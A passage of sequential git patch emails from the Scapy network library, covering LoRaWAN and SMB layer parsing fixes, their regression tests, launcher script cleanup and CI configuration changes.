# default version to parse + version = "1.1" # default version to parse encrypted = True fields_desc = [XBitField("Preamble", 0, 4), XBitField("PHDR", 0, 16), From 5f6c3ffd9d01d610b9ac203eb2420777ce7f87f0 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Fri, 28 Feb 2020 12:40:36 +0100 Subject: [PATCH 0047/1632] Fixing last errors --- scapy/contrib/loraphy2wan.py | 59 +++++++++++++++++++----------------- 1 file changed, 31 insertions(+), 28 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 6c8ba8efbac..7eebab76ec5 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -22,11 +22,12 @@ from __future__ import absolute_import +from scapy.packet import Packet from scapy.fields import BitField, ByteEnumField, ByteField, \ ConditionalField, IntField, LEShortField, PacketListField, \ StrFixedLenField, X3BytesField, XByteField, XIntField, \ XShortField, BitFieldLenField, LEX3BytesField, XBitField, \ - BitEnumField, XLEIntField, StrField, Packet + BitEnumField, XLEIntField, StrField class FCtrl_DownLink(Packet): @@ -348,7 +349,7 @@ class DeviceTimeAns(Packet): class ForceRejoinReq(Packet): - name ="ForceRejoinReq" + name = "ForceRejoinReq" fields_desc = [BitField("RFU", 0, 2), BitField("Period", 0, 3), BitField("Max_Retries", 0, 3), @@ -407,7 +408,7 @@ class MACCommand_up(Packet): RXTimingSetupReq, length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x08)), - ConditionalField(PacketListField("TxParamSetup", b"", # specific to 1.1 from here + ConditionalField(PacketListField("TxParamSetup", b"", # specific to 1.1 from here # noqa: E501 TxParamSetupReq, length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x09)), @@ -507,15 +508,15 @@ class FOpts(Packet): fields_desc = [ConditionalField(PacketListField("FOpts_up", b"", MACCommand_up, # piggybacked MAC Command for uplink # noqa: E501 length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 - lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 - and pkt.MType & 0b1 == 0 - and pkt.MType >= 0b010)), + lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 and + pkt.MType & 0b1 == 0 and + pkt.MType >= 0b010)), ConditionalField(PacketListField("FOpts_down", b"", MACCommand_down, # piggybacked MAC Command for downlink # noqa: E501 length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 - lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 - and pkt.MType & 0b1 == 1 - and pkt.MType <= 0b101))] + lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 and + pkt.MType & 0b1 == 1 and + pkt.MType <= 0b101))] def FOptsShow(pkt): @@ -533,21 +534,21 @@ class FHDR(Packet): name = "FHDR" fields_desc = [ConditionalField(PacketListField("DevAddr", b"", DevAddrElem, # noqa: E501 length_from=lambda pkt:4), - lambda pkt:(pkt.MType >= 0b010 - and pkt.MType <= 0b101)), + lambda pkt:(pkt.MType >= 0b010 and + pkt.MType <= 0b101)), ConditionalField(PacketListField("FCtrl", b"", FCtrl_DownLink, length_from=lambda pkt:1), - lambda pkt:(pkt.MType & 0b1 == 1 - and pkt.MType <= 0b101)), + lambda pkt:(pkt.MType & 0b1 == 1 and + pkt.MType <= 0b101)), ConditionalField(PacketListField("FCtrl", b"", FCtrl_UpLink, length_from=lambda pkt:1), - lambda pkt:(pkt.MType & 0b1 == 0 - and pkt.MType >= 0b010)), + lambda pkt:(pkt.MType & 0b1 == 0 and + pkt.MType >= 0b010)), ConditionalField(LEShortField("FCnt", 0), - lambda pkt:(pkt.MType >= 0b010 - and pkt.MType <= 0b101)), + lambda pkt:(pkt.MType >= 0b010 and + pkt.MType <= 0b101)), ConditionalField(PacketListField("FOpts_up", b"", MACCommand_up, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 @@ -582,7 +583,7 @@ class Join_Accept(Packet): XLEIntField("DevAddr", 0), DLsettings, XByteField("RxDelay", 0), - ConditionalField(StrFixedLenField("CFList", b"\x00" * 16 , 16), # noqa: E501 + ConditionalField(StrFixedLenField("CFList", b"\x00" * 16, 16), # noqa: E501 lambda pkt:(Join_Accept.dcflist is True))] def __init__(self, packet=""): # CFList calculated with rest of packet len @@ -594,6 +595,7 @@ def __init__(self, packet=""): # CFList calculated with rest of packet len def extract_padding(self, p): return "", p + RejoinType = {0: "NetID+DevEUI", 1: "JoinEUI+DevEUI", 2: "NetID+DevEUI"} @@ -610,11 +612,11 @@ class RejoinReq(Packet): # LoRa 1.1 specs class FRMPayload(Packet): name = "FRMPayload" fields_desc = [ConditionalField(StrField("DataPayload", 0, remain=4), # Downlink # noqa: E501 - lambda pkt:(pkt.MType == 0b101 - or pkt.MType == 0b011)), + lambda pkt:(pkt.MType == 0b101 or + pkt.MType == 0b011)), ConditionalField(StrField("DataPayload", 0, remain=6), # Uplink # noqa: E501 - lambda pkt:(pkt.MType == 0b100 - or pkt.MType == 0b010)), + lambda pkt:(pkt.MType == 0b100 or + pkt.MType == 0b010)), ConditionalField(PacketListField("Join_Request_Field", b"", Join_Request, length_from=lambda pkt:18), @@ -622,11 +624,11 @@ class FRMPayload(Packet): ConditionalField(PacketListField("Join_Accept_Field", b"", Join_Accept, count_from=lambda pkt:1), - lambda pkt:(pkt.MType == 0b001 - and LoRa.encrypted is False)), + lambda pkt:(pkt.MType == 0b001 and + LoRa.encrypted is False)), ConditionalField(StrField("Join_Accept_Encrypted", 0), lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is True)), # noqa: E501 - ConditionalField(PacketListField("ReJoin_Request_Field", b"", + ConditionalField(PacketListField("ReJoin_Request_Field", b"", # noqa: E501 RejoinReq, length_from=lambda pkt:14), lambda pkt:(pkt.MType == 0b111))] @@ -636,7 +638,8 @@ class MACPayload(Packet): name = "MACPayload" fields_desc = [FHDR, ConditionalField(ByteEnumField("FPort", 0, FPorts), - lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), # noqa: E501 + lambda pkt:(pkt.MType >= 0b010 and + pkt.MType <= 0b101)), FRMPayload] @@ -662,8 +665,8 @@ class PHYPayload(Packet): fields_desc = [MHDR, MACPayload, ConditionalField(XIntField("MIC", 0), - lambda pkt:(pkt.MType != 0b001 - or LoRa.encrypted is False))] + lambda pkt:(pkt.MType != 0b001 or + LoRa.encrypted is False))] class LoRa(Packet): # default frame (unclear specs => taken from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5677147/) # noqa: E501 From baf0b8ed877d01b36050791df87eecda41a7a5b3 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Fri, 28 Feb 2020 13:37:31 +0100 Subject: [PATCH 0048/1632] Trying to pass the check... --- scapy/contrib/loraphy2wan.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 7eebab76ec5..6ec5d5fa485 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -586,15 +586,15 @@ class Join_Accept(Packet): ConditionalField(StrFixedLenField("CFList", b"\x00" * 16, 16), # noqa: E501 lambda pkt:(Join_Accept.dcflist is True))] + # pylint: disable=R0201 + def extract_padding(self, p): + return "", p + def __init__(self, packet=""): # CFList calculated with rest of packet len if len(packet) > 18: Join_Accept.dcflist = True super(Join_Accept, self).__init__(packet) - # pylint: disable=R0201 - def extract_padding(self, p): - return "", p - RejoinType = {0: "NetID+DevEUI", 1: "JoinEUI+DevEUI", From 8f34f93c254a24e37f444f32c157bbd98c06fcee Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Wed, 18 Mar 2020 15:33:49 +0100 Subject: [PATCH 0049/1632] Completing regression tests for LoRaPHY2WAN Layer --- test/contrib/loraphy2wan.uts | 45 +++++++++++++++++++++++++++++++++++- 1 file changed, 44 insertions(+), 1 deletion(-) diff --git a/test/contrib/loraphy2wan.uts b/test/contrib/loraphy2wan.uts index 9402e0e4f86..bdd6fbef113 100644 --- a/test/contrib/loraphy2wan.uts +++ b/test/contrib/loraphy2wan.uts @@ -4,7 +4,7 @@ = Import the loraphy2wan layer from scapy.contrib.loraphy2wan import * -#from scapy.all import +from scapy.compat import raw # LoRa PHY to WAN @@ -21,3 +21,46 @@ p = b'\x00\x00\x00\x00lovecafemeeetoo\x00iiS\x02LI' pkt = LoRa(p) assert pkt.Join_Request_Field[0].DevEUI == b'meeetoo\x00' assert pkt.Join_Request_Field[0].DevNonce == 26985 + +p = b'\x0f0P@\xad\x15\x00`\x80\x06\x00\t\xca\xfe\x0c\x1d\x8d\x04\\\xb5' +pkt = LoRa(p) +assert pkt.MType == 2 +assert pkt.DataPayload == b'\xca\xfe' +assert pkt.FCnt == 6 +assert pkt.FPort == 9 +assert pkt.FCtrl[0].ADR == 1 +assert pkt.DevAddr[0].NwkID == 0xad +assert pkt.DevAddr[0].NwkAddr == 0x600015 + +p = b'\x0f0P\x80\xad\x15\x00`\x00\x01\x00\t\xca\xfe:\x98\x89|\x8f\xd4' +pkt = LoRa(p) +assert pkt.MType == 4 + += Decoding piggyback MAC Commands + +p = b'\r0\xc0\x80\xad\x15\x00`\x01\x01\x00\x02\xc0\xe3N\xb7\xc7\xae' +pkt = LoRa(p) +assert pkt.FOpts_up[0].CID == 2 +assert pkt.CRC == 0xc7ae + += Decoding an encrypted JA packet + +LoRa.encrypted = True +p = b'\x00\x00\x00 \x086\xe2\x87\xa9\x80\\\xb7\xee\x9e_\xff|\x9e\xe9z' +pkt = LoRa(p) +assert pkt.Join_Accept_Encrypted == b'6\xe2\x87\xa9\x80\\\xb7\xee\x9e_\xff|\x9e\xe9z' + += Packet crafting: generating an unencrypted JA frame + +ja = Join_Accept() +ja.JoinAppNonce=0x6fe14a +ja.NetID = 0x10203 +ja.DevAddr = 0x68e8cb1 +assert raw(ja) == b'J\xe1o\x03\x02\x01\xb1\x8c\x8e\x06\x00\x00' + += Generating an unencrypted LoRa JA packet + +LoRa.encrypted = False +pkt = LoRa(MType=0b001) +pkt.Join_Accept_Field = [ja] +assert raw(pkt) == b'\x00\x00\x00 J\xe1o\x03\x02\x01\xb1\x8c\x8e\x06\x00\x00\x00\x00\x00\x00' From a0a6936e71c4723c65ed229b9fde5d58e74f3015 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Wed, 18 Mar 2020 15:34:26 +0100 Subject: [PATCH 0050/1632] Fixing some issues on packets decoding, especially piggyback MAC commands + feedbacks from Guillaume --- scapy/contrib/loraphy2wan.py | 42 ++++++++++++++++++++++++------------ 1 file changed, 28 insertions(+), 14 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 6ec5d5fa485..d2ec9456aa9 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -27,7 +27,7 @@ ConditionalField, IntField, LEShortField, PacketListField, \ StrFixedLenField, X3BytesField, XByteField, XIntField, \ XShortField, BitFieldLenField, LEX3BytesField, XBitField, \ - BitEnumField, XLEIntField, StrField + BitEnumField, XLEIntField, StrField, PacketField class FCtrl_DownLink(Packet): @@ -107,7 +107,6 @@ class ResetConf(Packet): class LinkCheckReq(Packet): name = "LinkCheckReq" - fields_desc = [] class LinkCheckAns(Packet): @@ -140,12 +139,15 @@ class LinkADRAns_Status(Packet): name = "LinkADRAns_Status" fields_desc = [BitField("RFU", 0, 5), BitField("PowerACK", 0, 1), + BitField("DataRate", 0, 1), BitField("ChannelMaskACK", 0, 1)] class LinkADRAns(Packet): name = "LinkADRAns" - fields_desc = [LinkADRAns_Status] + fields_desc = [PacketField("status", + LinkADRAns_Status(), + LinkADRAns_Status)] class DutyCyclePL(Packet): @@ -408,7 +410,8 @@ class MACCommand_up(Packet): RXTimingSetupReq, length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x08)), - ConditionalField(PacketListField("TxParamSetup", b"", # specific to 1.1 from here # noqa: E501 + # specific to 1.1 from here + ConditionalField(PacketListField("TxParamSetup", b"", TxParamSetupReq, length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x09)), @@ -506,24 +509,33 @@ class MACCommand_down(Packet): class FOpts(Packet): name = "FOpts" fields_desc = [ConditionalField(PacketListField("FOpts_up", b"", - MACCommand_up, # piggybacked MAC Command for uplink # noqa: E501 + # UL piggy MAC Command + MACCommand_up, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010)), ConditionalField(PacketListField("FOpts_down", b"", - MACCommand_down, # piggybacked MAC Command for downlink # noqa: E501 + # DL piggy MAC Command + MACCommand_down, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101))] -def FOptsShow(pkt): +def FOptsDownShow(pkt): try: - if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010: # noqa: E501 + if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: # noqa: E501 return True - elif pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: # noqa: E501 + return False + except Exception: + return False + + +def FOptsUpShow(pkt): + try: + if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010: # noqa: E501 return True return False except Exception: @@ -552,11 +564,11 @@ class FHDR(Packet): ConditionalField(PacketListField("FOpts_up", b"", MACCommand_up, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 - FOptsShow), + FOptsUpShow), ConditionalField(PacketListField("FOpts_down", b"", MACCommand_down, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 - FOptsShow)] + FOptsDownShow)] FPorts = {0: "NwkSKey"} # anything else is AppSKey @@ -611,10 +623,10 @@ class RejoinReq(Packet): # LoRa 1.1 specs class FRMPayload(Packet): name = "FRMPayload" - fields_desc = [ConditionalField(StrField("DataPayload", 0, remain=4), # Downlink # noqa: E501 + fields_desc = [ConditionalField(StrField("DataPayload", "", remain=4), # Downlink # noqa: E501 lambda pkt:(pkt.MType == 0b101 or pkt.MType == 0b011)), - ConditionalField(StrField("DataPayload", 0, remain=6), # Uplink # noqa: E501 + ConditionalField(StrField("DataPayload", "", remain=6), # Uplink # noqa: E501 lambda pkt:(pkt.MType == 0b100 or pkt.MType == 0b010)), ConditionalField(PacketListField("Join_Request_Field", b"", @@ -636,10 +648,12 @@ class FRMPayload(Packet): class MACPayload(Packet): name = "MACPayload" + eFPort = False fields_desc = [FHDR, ConditionalField(ByteEnumField("FPort", 0, FPorts), lambda pkt:(pkt.MType >= 0b010 and - pkt.MType <= 0b101)), + pkt.MType <= 0b101 and + pkt.FCtrl[0].FOptsLen == 0)), FRMPayload] From c3ab78a0a27fc438b79ad1611f1996c4e4f73ac4 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 29 Mar 2020 20:48:04 +0000 Subject: [PATCH 0051/1632] Fix #2549 --- scapy/compat.py | 18 +++++++++++++----- 1 file changed, 13 insertions(+), 5 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index ffc73eacc78..f1c54a8c0ce 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -59,11 +59,19 @@ def bytes_encode(x): return x.encode() return bytes(x) - def plain_str(x): - """Convert basic byte objects to str""" - if isinstance(x, bytes): - return x.decode(errors="ignore") - return str(x) + if six.PY34: + def plain_str(x): + """Convert basic byte objects to str""" + if isinstance(x, bytes): + return x.decode(errors="ignore") + return str(x) + else: + # Python 3.5+ + def plain_str(x): + """Convert basic byte objects to str""" + if isinstance(x, bytes): + return x.decode(errors="backslashreplace") + return str(x) def chb(x): """Same than chr() but encode as bytes.""" From 411739f47a18879d2731b8f3b709301a1bb611b1 Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 26 Mar 2020 14:37:23 +0100 Subject: [PATCH 0052/1632] Unify run_scapy[].bat --- run_scapy.bat | 11 ++++++++++- run_scapy_py2.bat | 4 ---- run_scapy_py3.bat | 4 ---- 3 files changed, 10 insertions(+), 9 deletions(-) delete mode 100644 run_scapy_py2.bat delete mode 100644 run_scapy_py3.bat diff --git a/run_scapy.bat b/run_scapy.bat index 332df0201a8..cfaa30ad643 100644 --- a/run_scapy.bat +++ b/run_scapy.bat @@ -1,8 +1,17 @@ @echo off set PYTHONPATH=%~dp0 +REM shift will not work with %* +set "_args=%*" +IF "%1" == "--2" ( + set PYTHON=python + set "_args=%_args:~3%" +) ELSE IF "%1" == "--3" ( + set PYTHON=python3 + set "_args=%_args:~3%" +) IF "%PYTHON%" == "" set PYTHON=python3 WHERE %PYTHON% >nul 2>&1 IF %ERRORLEVEL% NEQ 0 set PYTHON=python -%PYTHON% -m scapy %* +%PYTHON% -m scapy %_args% title Scapy - dead PAUSE \ No newline at end of file diff --git a/run_scapy_py2.bat b/run_scapy_py2.bat deleted file mode 100644 index 857c39b1226..00000000000 --- a/run_scapy_py2.bat +++ /dev/null @@ -1,4 +0,0 @@ -@echo off -set PYTHONPATH=%~dp0 -set PYTHON=python -call run_scapy.bat \ No newline at end of file diff --git a/run_scapy_py3.bat b/run_scapy_py3.bat deleted file mode 100644 index 89490be5629..00000000000 --- a/run_scapy_py3.bat +++ /dev/null @@ -1,4 +0,0 @@ -@echo off -set PYTHONPATH=%~dp0 -set PYTHON=python3 -call run_scapy.bat \ No newline at end of file From 1b7cd5e7c9c0319105bd88c976093c43600428cb Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 26 Mar 2020 14:38:25 +0100 Subject: [PATCH 0053/1632] Remove global vars in main.py --- scapy/main.py | 17 ++++++----------- 1 file changed, 6 insertions(+), 11 deletions(-) diff --git a/scapy/main.py b/scapy/main.py index 524b1ba62c8..6bdc205c9af 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -31,12 +31,10 @@ from scapy.themes import DefaultTheme, BlackAndWhite, apply_ipython_style from scapy.consts import WINDOWS -from scapy.compat import cast, Any, Dict, List, Optional, Union +from scapy.compat import cast, Any, Dict, List, Optional, Tuple, Union IGNORED = list(six.moves.builtins.__dict__) -GLOBKEYS = [] # type: List[str] - LAYER_ALIASES = { "tls": "tls.all" } @@ -120,7 +118,6 @@ def _validate_local(x): DEFAULT_PRESTART_FILE = _probe_config_file(".scapy_prestart.py") DEFAULT_STARTUP_FILE = _probe_config_file(".scapy_startup.py") -SESSION = {} # type: Dict[str, Any] def _usage(): @@ -394,10 +391,10 @@ def update_session(fname=None): def init_session(session_name, # type: Optional[Union[str, None]] mydict=None # type: Optional[Union[Dict[str, Any], None]] ): - # type: (...) -> None + # type: (...) -> Tuple[Dict[str, Any], List[str]] from scapy.config import conf - global SESSION - global GLOBKEYS + SESSION = {} # type: Dict[str, Any] + GLOBKEYS = [] # type: List[str] scapy_builtins = {k: v for k, v in six.iteritems( @@ -446,6 +443,7 @@ def init_session(session_name, # type: Optional[Union[str, None]] six.moves.builtins.__dict__["scapy_session"].update(mydict) update_ipython_session(mydict) GLOBKEYS.extend(mydict) + return SESSION, GLOBKEYS ################ # Main # @@ -493,9 +491,6 @@ def _len(line): def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): # type: (Optional[Any], Optional[Any], Optional[Any], int) -> None """Starts Scapy's console.""" - global SESSION - global GLOBKEYS - try: if WINDOWS: # colorama is bundled within IPython. @@ -570,7 +565,7 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): # Reset sys.argv, otherwise IPython thinks it is for him sys.argv = sys.argv[:1] - init_session(session_name, mydict) + SESSION, GLOBKEYS = init_session(session_name, mydict) if STARTUP_FILE: _read_config_file(STARTUP_FILE, interactive=True) From abfaa55a9f293beb7aa0caa5ee63a3ef929d674e Mon Sep 17 00:00:00 2001 From: gpotter Date: Fri, 27 Mar 2020 14:55:02 +0100 Subject: [PATCH 0054/1632] Disable jedi on IPython --- scapy/main.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/scapy/main.py b/scapy/main.py index 6bdc205c9af..30bc53669e2 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -700,6 +700,9 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): if int(IPython.__version__[0]) >= 6: cfg.TerminalInteractiveShell.term_title_format = ("Scapy v%s" % conf.version) + # As of IPython 6-7, the jedi completion module is a dumpster + # of fire that should be scrapped never to be seen again. + cfg.Completer.use_jedi = False else: cfg.TerminalInteractiveShell.term_title = False cfg.HistoryAccessor.hist_file = conf.histfile From 1ed347773a2b1d395bde56491e4a8ae7be2a3277 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 18 Mar 2020 12:07:10 +0100 Subject: [PATCH 0055/1632] Use osx_image to change the Python interpreter version --- .config/ci/install.sh | 12 ++++++++---- .travis.yml | 14 +++++++++++--- 2 files changed, 19 insertions(+), 7 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index e7b13c206eb..e8d470e9458 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -23,11 +23,15 @@ then $SCAPY_SUDO apt-get -qy install libpcap-dev fi -# Update pip & setuptools (tox uses those) -python -m pip install --upgrade pip setuptools --ignore-installed +# On Travis, "osx" dependencies are installed in .travis.yml +if [ "$TRAVIS_OS_NAME" != "osx" ] +then + # Update pip & setuptools (tox uses those) + python -m pip install --upgrade pip setuptools --ignore-installed -# Make sure tox is installed and up to date -python -m pip install -U tox --ignore-installed + # Make sure tox is installed and up to date + python -m pip install -U tox --ignore-installed +fi # Dump Environment (so that we can check PATH, UT_FLAGS, etc.) openssl version diff --git a/.travis.yml b/.travis.yml index dc5fb3885cf..e335a067742 100644 --- a/.travis.yml +++ b/.travis.yml @@ -29,14 +29,22 @@ jobs: # run OSX - os: osx - language: generic + osx_image: xcode9.3 + language: shell + before_install: + - python --version + - pip install --upgrade --ignore-installed --user pip tox setuptools env: - TOXENV=py27-bsd_non_root,py27-bsd_root,codecov - os: osx - language: generic + osx_image: xcode10.2 + language: shell + before_install: + - python3 --version + - pip3 install --upgrade --ignore-installed pip tox setuptools env: - - TOXENV=py36-bsd_non_root,py36-bsd_root,codecov + - TOXENV=py37-bsd_non_root,py37-bsd_root,codecov # run custom root tests # isotp From b21e2c5fe5464fe7102f2c427d9a13d8b49f3e10 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 31 Mar 2020 16:34:43 +0200 Subject: [PATCH 0056/1632] Catch an uncatched exception which show up in some corner cases --- scapy/contrib/isotp.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 873a1a58d4b..6184a6b1bd5 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -746,6 +746,8 @@ def my_cb(msg): s.ins.rx_callbacks.remove(my_cb) except ValueError: pass + except AttributeError: + pass ready_sockets = find_ready_sockets() return ready_sockets, None From f38d45a0c359a0abbf6cbc0a125b7fcdd54038cc Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 1 Apr 2020 10:54:06 +0200 Subject: [PATCH 0057/1632] Fallback to the default system Python interpreter --- run_scapy | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/run_scapy b/run_scapy index 86efae75df4..4f103dc14ba 100755 --- a/run_scapy +++ b/run_scapy @@ -9,9 +9,14 @@ then in -2) PYTHON=python2; shift;; -3) PYTHON=python3; shift;; - --) break;; + --) PYTHON=python3; break;; esac done - PYTHON=${PYTHON:-python3} +fi +$PYTHON --version > /dev/null 2>&1 +if [ ! $? -eq 0 ] +then + echo "WARNING: '$PYTHON' not found, using 'python' instead." + PYTHON=python fi PYTHONPATH=$DIR exec "$PYTHON" -m scapy "$@" From 98254fa0d1b72dd7e52ff13e193238b95450b4db Mon Sep 17 00:00:00 2001 From: _Frky <3105926+Frky@users.noreply.github.com> Date: Wed, 1 Apr 2020 13:57:05 +0200 Subject: [PATCH 0058/1632] Bind layer NBTSession on TCP port 445 --- scapy/layers/netbios.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 2c5d54dc375..c42b455b5ea 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -290,3 +290,4 @@ class NBTSession(Packet): bind_layers(UDP, NBNSWackResponse, sport=137) bind_layers(UDP, NBTDatagram, dport=138) bind_layers(TCP, NBTSession, dport=139) +bind_layers(TCP, NBTSession, dport=445) From 68b53a127664dd0daba2a31f08f5e5691f790b73 Mon Sep 17 00:00:00 2001 From: _Frky <3105926+Frky@users.noreply.github.com> Date: Wed, 1 Apr 2020 13:57:44 +0200 Subject: [PATCH 0059/1632] Add generic class for SMBNegociate header --- scapy/layers/smb.py | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 4dc42f1229a..4c7ec455792 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -140,6 +140,17 @@ class SMBNegociate_Protocol_Request_Header(Packet): ByteField("WordCount", 0), LEShortField("ByteCount", 12)] +class SMBNegociate_Protocol_Request_Header_Generic(Packet): + name = "SMBNegociate Protocol Request Header Generic" + fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4)] + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(pkt) >= 4: + if pkt[:4] == "\xffSMB": + return SMBNegociate_Protocol_Request_Header + return cls + # SMB Negotiate Protocol Request Tail @@ -367,7 +378,7 @@ class SMBSession_Setup_AndX_Response(Packet): StrNullField("NativeFileSystem", "")] -bind_layers(NBTSession, SMBNegociate_Protocol_Request_Header, ) +bind_layers(NBTSession, SMBNegociate_Protocol_Request_Header_Generic, ) bind_layers(NBTSession, SMBNegociate_Protocol_Response_Advanced_Security, ExtendedSecurity=1) # noqa: E501 bind_layers(NBTSession, SMBNegociate_Protocol_Response_No_Security, ExtendedSecurity=0, EncryptionKeyLength=8) # noqa: E501 bind_layers(NBTSession, SMBNegociate_Protocol_Response_No_Security_No_Key, ExtendedSecurity=0, EncryptionKeyLength=0) # noqa: E501 From d7bbf4e0c63c42956858f12cd8824b85a81645b6 Mon Sep 17 00:00:00 2001 From: _Frky <3105926+Frky@users.noreply.github.com> Date: Wed, 1 Apr 2020 15:49:53 +0200 Subject: [PATCH 0060/1632] Add minimalistic tests for SMB and fix bug in SMBNegociate generic header --- scapy/layers/smb.py | 4 ++-- test/smb.uts | 38 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 40 insertions(+), 2 deletions(-) create mode 100644 test/smb.uts diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 4c7ec455792..c8c284326a3 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -146,8 +146,8 @@ class SMBNegociate_Protocol_Request_Header_Generic(Packet): @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): - if _pkt and len(pkt) >= 4: - if pkt[:4] == "\xffSMB": + if _pkt and len(_pkt) >= 4: + if _pkt[:4] == b'\xffSMB': return SMBNegociate_Protocol_Request_Header return cls diff --git a/test/smb.uts b/test/smb.uts new file mode 100644 index 00000000000..eea37871f43 --- /dev/null +++ b/test/smb.uts @@ -0,0 +1,38 @@ +############ +############ ++ SMB + += test SMB Negociate Header - dissect + +# OK test +rawpkt = b'\x45\x00\x00\x5b\x69\x10\x40\x00\x73\x06\xca\x85\x7a\xa0\x9a\xb6\xc0\xa8\xfe\x07\xeb\xec\x01\xbd\xaf\x97\x2e\xb7\x78\x60\x84\x6c\x50\x18\x40\x29\xd5\x36\x00\x00\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x01\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x20\x18\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00' +pkt = IP(rawpkt) +# Check layers +assert TCP in pkt +assert NBTSession in pkt +assert pkt[NBTSession].LENGTH == 47 +assert SMBNegociate_Protocol_Request_Header in pkt +smb = pkt[SMBNegociate_Protocol_Request_Header] +# Check header values +print(smb.show()) +assert smb.Start == b'\xffSMB' +assert smb.Command == 0x72 # SMB_COM_NEGOCIATE + +# KO test +rawpkt = b'\x45\x00\x00\x5b\x69\x10\x40\x00\x73\x06\xca\x85\x7a\xa0\x9a\xb6\xc0\xa8\xfe\x07\xeb\xec\x01\xbd\xaf\x97\x2e\xb7\x78\x60\x84\x6c\x50\x18\x40\x29\xd5\x36\x00\x00\x00\x00\x00\x2f\xf0\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x01\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x20\x18\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00' +pkt = IP(rawpkt) +# Check layers +assert TCP in pkt +assert NBTSession in pkt +assert pkt[NBTSession].LENGTH == 47 +assert SMBNegociate_Protocol_Request_Header_Generic in pkt +# Should not have a proper SMBNegociate header as magic is \xf0SMB, not \xffSMB +assert SMBNegociate_Protocol_Request_Header not in pkt + + += test SMB Negociate Header - assemble + +pkt = IP() / TCP() / NBTSession() / SMBNegociate_Protocol_Request_Header() +assert pkt[NBTSession].TYPE == 0x00 # session message 